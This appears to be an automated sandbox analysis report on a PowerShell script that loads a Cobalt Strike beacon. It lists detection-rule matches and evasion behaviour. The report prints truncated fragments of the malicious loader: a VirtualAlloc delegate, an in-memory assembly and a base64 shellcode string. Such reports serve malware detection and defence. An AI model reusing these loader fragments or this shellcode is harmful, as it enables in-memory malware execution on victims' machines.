Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.evad.winPS1@2/5@0/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED340B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

0_2_000001A6ED340B70

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED343A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,

0_2_000001A6ED343A64

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u31gyipb.z3t.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: oEFrY6Xcyl.ps1

ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((test kernel32.dll VirtualAlloc), (test2 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String('bnlicXZrqsZros8DIyMja64+ydzc3Guq/Gui4PerIiPc8GKb05aBdUsnIyMjeWuq2tzzIyMjIyMjIyMjIyIjIy08mS0jlyruApsib+4Cd0tKUANTUUxEUUJOA0BCTU1MVwNBRgNRVk0DSk0DZ2xwA05MR0YNLi4pByMjIyMjIyOmhQ4/4uRgbO

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED360198 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,

0_2_000001A6ED360198

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED31776C push 0000006Ah; retf	0_2_000001A6ED317784
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED36916C push 0000006Ah; retf	0_2_000001A6ED369184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34792E25 pushad ; iretd	0_2_00007FFD34792E91
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34792E45 pushad ; iretd	0_2_00007FFD34792E91
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3479A26C push esp; retf	0_2_00007FFD3479A26D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34795BB8 pushad ; iretd	0_2_00007FFD34795BB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34860565 push edi; retf	0_2_00007FFD34860566

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED3501A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000001A6ED3501A8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED33FA1C		0_2_000001A6ED33FA1C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED345854		0_2_000001A6ED345854

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5027			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4799			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

API coverage: 2.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED345854

0_2_000001A6ED345854

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056

Thread sleep time: -14757395258967632s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED349220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_000001A6ED349220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED341C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_000001A6ED341C30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602674229.000001A6ECF9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000000.00000002.4602674229.000001A6ECF9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW>

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED3521DC __crtCaptureCurrentContext,IsDebuggerPresent,

0_2_000001A6ED3521DC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED359744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_000001A6ED359744

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED360198 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,

0_2_000001A6ED360198

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED3621C0 GetProcessHeap,DeleteProcThreadAttributeList,

0_2_000001A6ED3621C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

